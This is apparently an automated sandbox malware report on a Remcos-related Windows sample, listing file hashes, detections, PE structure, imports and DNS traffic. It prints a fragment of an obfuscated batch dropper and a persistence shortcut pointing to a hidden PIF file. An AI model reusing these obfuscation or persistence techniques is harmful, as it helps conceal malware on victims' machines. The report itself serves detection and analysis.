                                                                                      Preview:@echo off..set "Nnqr=set "..%Nnqr%"njyC=="..%Nnqr%"qkMvMLsfma%njyC%http"..%Nnqr%"dbvWEsxWns%njyC%rem "..%Nnqr%"NpzRZtRBVV%njyC%Cloa"..%Nnqr%"ftNVZzSZxa%njyC%/Bat"..%Nnqr%"TwupSEtIWD%njyC%gith"..%Nnqr%"yIGacXULig%njyC%k"..%Nnqr%"uGlGnqCSun%njyC%h2sh"..%Nnqr%"FUsYUbfxRq%njyC%s://"..%Nnqr%"ewghYLVJDJ%njyC%om/c"..%Nnqr%"ZxOeNaoDFO%njyC%ub.c"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%%TwupSEtIWD%%ZxOeNaoDFO%%ewghYLVJDJ%%uGlGnqCSun%%ftNVZzSZxa%%NpzRZtRBVV%%yIGacXULig%..%Nnqr%"dbvWEsxWns%njyC%@ech"..%Nnqr%"qkMvMLsfma%njyC%o of"..%Nnqr%"FUsYUbfxRq%njyC%f"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%..%Nnqr%"NOtbuvMLuE%njyC%alph"..%Nnqr%"jSzGRzcKvC%njyC%ul 2"..%Nnqr%"KhBjpctAkV%njyC%.exe"..%Nnqr%"ftNVZzSZxa%njyC%c32."..%Nnqr%"czhHhGJsdj%njyC%m32\"..%Nnqr%"TOzhrohQZT%njyC% C:\"..%Nnqr%"NpzRZtRBVV%njyC%exe "..%Nnqr%"ppIMorhdlj%njyC% &"..%Nnqr%"SXdBSshqoL%njyC%Publ"..%Nnqr%"apGEijJnKT%njyC%\cmd"..%Nnqr%"qkMvMLsfma%njyC%Wind"..%Nnqr%"QxcSEoHMVZ%njyC%s\\S"..%Nnqr%"AvhQIkjRki%njyC%a.ex"..%Nnqr%"yIGacXULig%njyC%/
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):131648
                                                                                      Entropy (8bit):5.225468064273746
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                      MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                      SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                      SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                      SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                      Malicious:true
                                                                                       Antivirus:
                                                                                       • Antivirus: ReversingLabs, Detection: 0%
                                                                                       • Antivirus: Virustotal, Detection: 0%
                                                                                       Joe Sandbox View:
                                                                                       • Filename: Enquiry 230424.bat, Detection: malicious
                                                                                       • Filename: URGENTE_NOTIFICATION.cmd, Detection: malicious
                                                                                       • Filename: OKhCyJ619J.rtf, Detection: malicious
                                                                                       • Filename: fu56fbrtn8.exe, Detection: malicious
                                                                                       • Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious
                                                                                       • Filename: HFiHWvPsvA.rtf, Detection: malicious
                                                                                       • Filename: payment swift.xls, Detection: malicious
                                                                                       • Filename: VdwJB2cS5l.exe, Detection: malicious
                                                                                       • Filename: SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe, Detection: malicious
                                                                                       • Filename: Purchase order.exe, Detection: malicious
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):116908
                                                                                      Entropy (8bit):5.087211878722834
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:AxdWID3z1y5XtsBms9bOPu5jDqWte6VNCl7MbiRvRRJHu:AxdB/usBLOP8qWte6VQRRJHu
                                                                                      MD5:566B326055C3ED8E2028AA1E2C1054D0
                                                                                      SHA1:C25FA6D6369C083526CAFCF45B5F554635AFE218
                                                                                      SHA-256:A692D4305B95E57E2CFC871D53A41A5BFC9E306CB1A86CA1159DB4F469598714
                                                                                      SHA-512:DA4B0B45D47757B69F9ABC1817D3CB3C85DEB08658E55F07B016FBA053EFE541A5791B9B2B380C25B440BBAE6916C5A2245261553CA3C5025D9D55C943F9823C
                                                                                      Malicious:true
                                                                                       Antivirus:
                                                                                       • Antivirus: Avira, Detection: 100%
                                                                                       • Antivirus: ReversingLabs, Detection: 83%
                                                                                       • Antivirus: Virustotal, Detection: 68%
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):68096
                                                                                      Entropy (8bit):6.328046551801531
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                      MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                      SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                      SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                      SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                      Malicious:true
                                                                                       Antivirus:
                                                                                       • Antivirus: ReversingLabs, Detection: 3%
                                                                                       • Antivirus: Virustotal, Detection: 0%
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Xjfxsfmn.PIF">), ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):100
                                                                                      Entropy (8bit):5.0888566309110495
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMNdWD1Osb6U+K90y:HRYFVmTWDyzYUD1OE/b0y
                                                                                      MD5:570987CEFD2924D7D4799ED446EA8A55
                                                                                      SHA1:9287AAFF54FAF5B69A9B6E9965B39BAA6B99F063
                                                                                      SHA-256:EEC192DB3F64EF0C6838C862E8618CEC18DC157BBC93C937908AC8FFDD59B464
                                                                                      SHA-512:58D44C1311E9B4DA3947EBF6189E6B380033E7E2A8A112E11BBFA79A57CAB00EF4B7D5A5CED6F30D4495AF2ACCA42B2DD0B8396DE585BBBD1F079998A5390D3E
                                                                                      Malicious:true
                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Xjfxsfmn.PIF"..IconIndex=21..HotKey=63..
                                                                                      Process:C:\ProgramData\Remcos\remcos.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):366
                                                                                      Entropy (8bit):4.665424305888495
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:+VaRdNpgRqtDajMyc0opRdNpgRqtDajMyc0opRdNpgRqtDajMyc0ov:NjRDtyc0oVjRDtyc0oVjRDtyc0ov
                                                                                      MD5:FEC9FF49E3AE268178230CDB3FF67676
                                                                                      SHA1:B84497F32A7990AE46C9BC74698468187A076C04
                                                                                      SHA-256:A5EB9AA311F946178BE64D284F4F1FCE6372F95CB19B07E749172C346A7B2C75
                                                                                      SHA-512:8932674400526EACB7B48F507DE7EEB828FF7FE5D931F35515C194505069FE5AB5450FE2E760E4AA7710271B7CD29A18C05725C70E8B6117313EB3BDE0F01667
                                                                                      Malicious:false
                                                                                      Preview:24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...
                                                                                      Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):366
                                                                                      Entropy (8bit):4.665424305888495
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:+VaRdNpgRqtDajMyc0opRdNpgRqtDajMyc0opRdNpgRqtDajMyc0ov:NjRDtyc0oVjRDtyc0oVjRDtyc0ov
                                                                                      MD5:FEC9FF49E3AE268178230CDB3FF67676
                                                                                      SHA1:B84497F32A7990AE46C9BC74698468187A076C04
                                                                                      SHA-256:A5EB9AA311F946178BE64D284F4F1FCE6372F95CB19B07E749172C346A7B2C75
                                                                                      SHA-512:8932674400526EACB7B48F507DE7EEB828FF7FE5D931F35515C194505069FE5AB5450FE2E760E4AA7710271B7CD29A18C05725C70E8B6117313EB3BDE0F01667
                                                                                      Malicious:false
                                                                                      Preview:24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...
                                                                                      Process:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):68096
                                                                                      Entropy (8bit):6.328046551801531
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                      MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                      SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                      SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                      SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.422853453364174
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                      • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      File name:udVh4Ist4Z.exe
                                                                                      File size:1'639'424 bytes
                                                                                      MD5:2cc30d206669699e58870623365fef82
                                                                                      SHA1:de5e70f094d0b72660aa57b87667edd9d52971fc
                                                                                      SHA256:42ac8e7e9df9877af1382f5626fd74e63210d307f6d577cd5b387ffd0c9520bd
                                                                                      SHA512:2f1f275b9a928844d8f97dc07aa4d0f53da61fd06a507424a873ba128e71d2754e710dbebe1935adc3dada94b42417b1fc30a1915a40b2cffc655c55d7c62005
                                                                                      SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/BhM6wIJp4m+3bu8U2flxAv:QkTpT9K1mzyhM6wW4mEQ2W
                                                                                      TLSH:E775BE51B790D1B3E03B10FED73AB5D862CDBAA4295374CCB2D50A7BDE37982244528E
                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                      Icon Hash:3575b4a8b0b085d1
                                                                                      Entrypoint:0x4575c0
                                                                                      Entrypoint Section:CODE
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                      DLL Characteristics:
                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:55bb4abe492867a8202968458cfd638d
                                                                                      Instruction
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      add esp, FFFFFFF0h
                                                                                      mov eax, 00457400h
                                                                                      call 00007F8F54B91525h
                                                                                      mov eax, dword ptr [0056C65Ch]
                                                                                      mov eax, dword ptr [eax]
                                                                                      call 00007F8F54BD9899h
                                                                                      mov ecx, dword ptr [0056C740h]
                                                                                      mov eax, dword ptr [0056C65Ch]
                                                                                      mov eax, dword ptr [eax]
                                                                                      mov edx, dword ptr [00456D98h]
                                                                                      call 00007F8F54BD9899h
                                                                                      mov eax, dword ptr [0056C65Ch]
                                                                                      mov eax, dword ptr [eax]
                                                                                      call 00007F8F54BD990Dh
                                                                                      call 00007F8F54B8F4E0h
                                                                                      lea eax, dword ptr [eax+00h]
                                                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x171000 | 0x78 | .edata
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x16e000 | 0x2066 | .idata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17b000 | 0x1c600 | .rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x174000 | 0x6328 | .reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x173000 | 0x18 | .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                      CODE | 0x1000 | 0x56608 | 0x56800 | e749dfadfcac9668fb6395a24d87ee54 | False | 0.5225823022037572 | data | 6.515156263316965 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      DATA | 0x58000 | 0x1147cc | 0x114800 | f3b3abebaed6fcdff591bc5a977c1e25 | False | 0.7515937570637432 | data | 7.548892177394611 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      BSS | 0x16d000 | 0xd5d | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .idata | 0x16e000 | 0x2066 | 0x2200 | 3aa6d5d6785cddb9a5bee660a602eb8e | False | 0.35340073529411764 | data | 4.887767818013599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .edata | 0x171000 | 0x78 | 0x200 | 86a99c9586c90c6cc57ed7fd9ed47346 | False | 0.2109375 | data | 1.5388005609521742 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      .tls | 0x172000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rdata | 0x173000 | 0x18 | 0x200 | 9d1bba21368430faa0bf768fbfaa7fe5 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "W" | 0.2069200177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      .reloc | 0x174000 | 0x6328 | 0x6400 | 3a96abebf4210d131401c2199c50cc0a | False | 0.6482421875 | data | 6.687430221930037 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      .rsrc | 0x17b000 | 0x1c600 | 0x1c600 | 76ae21a9e1fd9d25b479364b03fa95c9 | False | 0.13988504955947137 | data | 4.178255960193848 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                      RT_CURSOR | 0x17b800 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
                                                                                      RT_CURSOR | 0x17b934 | 0x134 | data | | | 0.4642857142857143
                                                                                      RT_CURSOR | 0x17ba68 | 0x134 | data | | | 0.4805194805194805
                                                                                      RT_CURSOR | 0x17bb9c | 0x134 | data | | | 0.38311688311688313
                                                                                      RT_CURSOR | 0x17bcd0 | 0x134 | data | | | 0.36038961038961037
                                                                                      RT_CURSOR | 0x17be04 | 0x134 | data | | | 0.4090909090909091
                                                                                      RT_CURSOR | 0x17bf38 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
                                                                                      RT_ICON | 0x17c06c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.28635084427767354
                                                                                      RT_ICON | 0x17d114 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.18278008298755186
                                                                                      RT_ICON | 0x17f6bc | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m | | | 0.11275415896487985
                                                                                      RT_ICON | 0x184b44 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m | | | 0.10086466165413534
                                                                                      RT_ICON | 0x18b32c | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m | | | 0.08608366617616145
                                                                                      RT_STRING | 0x1947d4 | 0x1d4 | AmigaOS bitmap font "n", fc_YSize 27392, 18688 elements, 2nd "S", 3rd | | | 0.43162393162393164
                                                                                      RT_STRING | 0x1949a8 | 0x1c8 | data | | | 0.4298245614035088
                                                                                      RT_STRING | 0x194b70 | 0xe8 | data | | | 0.603448275862069
                                                                                      RT_STRING | 0x194c58 | 0x2f8 | data | | | 0.45
                                                                                      RT_STRING | 0x194f50 | 0xd8 | data | | | 0.5879629629629629
                                                                                      RT_STRING | 0x195028 | 0x22c | data | | | 0.48201438848920863
                                                                                      RT_STRING | 0x195254 | 0x3f4 | data | | | 0.3715415019762846
                                                                                      RT_STRING | 0x195648 | 0x370 | data | | | 0.39431818181818185
                                                                                      RT_STRING | 0x1959b8 | 0x3e8 | data | | | 0.33
                                                                                      RT_STRING | 0x195da0 | 0x234 | data | | | 0.475177304964539
                                                                                      RT_STRING | 0x195fd4 | 0xec | data | | | 0.5508474576271186
                                                                                      RT_STRING | 0x1960c0 | 0x1b4 | data | | | 0.5206422018348624
                                                                                      RT_STRING | 0x196274 | 0x3e4 | data | | | 0.32028112449799195
                                                                                      RT_STRING | 0x196658 | 0x358 | data | | | 0.4158878504672897
                                                                                      RT_STRING | 0x1969b0 | 0x2b4 | data | | | 0.4060693641618497
                                                                                      RT_RCDATA | 0x196c64 | 0x10 | data | | | 1.5
                                                                                      RT_RCDATA | 0x196c74 | 0x22c | data | | | 0.7751798561151079
                                                                                      RT_RCDATA | 0x196ea0 | 0x652 | Delphi compiled form 'TForm1' | | | 0.43325092707045737
                                                                                      RT_GROUP_CURSOR | 0x1974f4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
                                                                                      RT_GROUP_CURSOR | 0x197508 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
                                                                                      RT_GROUP_CURSOR | 0x19751c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
                                                                                      RT_GROUP_CURSOR | 0x197530 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
                                                                                      RT_GROUP_CURSOR | 0x197544 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
                                                                                      RT_GROUP_CURSOR | 0x197558 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
                                                                                      RT_GROUP_CURSOR | 0x19756c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
                                                                                      RT_GROUP_ICON | 0x197580 | 0x4c | data | | | 0.8421052631578947
| DLL | Import |
|---|---|
| kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle |
| user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey |
| oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
| kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey |
| kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle |
| version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
| gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt |
| user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout |
| kernel32.dll | Sleep |
| oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit |
| comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create |
| comdlg32.dll | GetSaveFileNameA, GetOpenFileNameA |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Apr 24, 2024 10:58:58.462943077 CEST | 58830 | 53 | 192.168.2.6 | 1.1.1.1 |
| Apr 24, 2024 10:58:58.670382977 CEST | 65243 | 53 | 192.168.2.6 | 1.1.1.1 |
| Apr 24, 2024 10:58:59.917632103 CEST | 59224 | 53 | 192.168.2.6 | 1.1.1.1 |
| Apr 24, 2024 10:59:15.036705971 CEST | 62538 | 53 | 192.168.2.6 | 1.1.1.1 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Apr 24, 2024 10:58:58.462943077 CEST | 192.168.2.6 | 1.1.1.1 | 0x3b5c | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 10:58:58.670382977 CEST | 192.168.2.6 | 1.1.1.1 | 0x4348 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false |
